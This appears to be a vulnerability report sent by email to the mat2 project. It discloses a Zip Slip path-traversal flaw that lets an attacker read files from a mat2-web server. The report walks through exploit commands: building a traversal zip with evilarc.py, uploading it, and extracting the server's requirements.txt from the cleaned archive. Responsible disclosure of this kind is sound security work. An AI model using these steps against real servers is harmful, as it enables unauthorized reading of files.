Arbitrary read via malicious zip file
[As received by email, sent by jfriedli]
I found an issue in mat2. It is vulnerable to the Zip slip vulnerability.
Here a little summary :)
Create malicious file
Script used to create a Zip Slip file: https://github.com/ptoomey3/evilarc/blob/master/evilarc.py
python2.7 evilarc.py filename_to_extract.txt -d 0 -o "unix" -p "../../../home/kali/Documents/projects"
filename_to_extract.txt is the filename of the file you want to extract from the victim system.
Note: it has to be a supported extension by mat2
and upon extracting the cleaned zip file you receive the file from the victim.
Example Extracting Requirements.txt From Webserver
Create empty target file we want to extract.
We know the absolute path of the target file on the server from the Dockerfile.
python2.7 path_tra.py requirements.txt -d 0 -o "unix" -p "../../../var/www/mat2-web/" Creating evil.zip containing ../../../var/www/mat2-web/requirements.txt
Check if if the path and filename is correct.
cat evilzip PK�m�T*../../../var/www/mat2-web/requirements.txtPK�m�T*�t2-web/requirements.txtPKXH
Then upload the file via the web interface and download the cleaned zip.
Afterward we unzip it.
unzip evil.cleaned.zip Archive: evil.cleaned.zip warning: skipped "../" path component(s) in ../../../var/www/mat2-web/requirements.txt extracting: var/www/mat2-web/requirements.txt
And we can proof that we received the content of the
requirements.txt from the server.
cat var/www/mat2-web/requirements.txt mutagen==1.45.1 ffmpeg==1.4 bubblewrap==1.2.0 mat2==0.12.4 flask==2.1.2 Flask-RESTful==0.3.9 Flask-Cors==3.0.10 Cerberus==1.3.4 Flask-Testing==0.8.1 blinker==1.4 flasgger==0.9.5 Flask-Assets==2.0